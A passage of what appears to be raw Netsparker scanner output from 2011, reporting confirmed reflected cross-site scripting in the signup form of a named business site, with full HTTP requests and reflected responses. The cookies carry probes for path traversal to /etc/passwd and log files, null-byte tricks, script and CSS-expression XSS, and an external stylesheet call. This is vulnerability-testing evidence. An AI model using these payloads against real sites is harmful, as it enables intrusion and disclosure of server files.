>Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST '"--></style></script><script>alert(0x00133F)</script>
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 312
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00133F)%3c%2fscript%3e&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:55 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4A9EC1AAB2D01C6725CC72E1835E93A4; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="'"--></style></script><script>netsparker(0x00133F)</script>" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailA..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST '"--></style></script><script>alert(0x001350)</script>
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
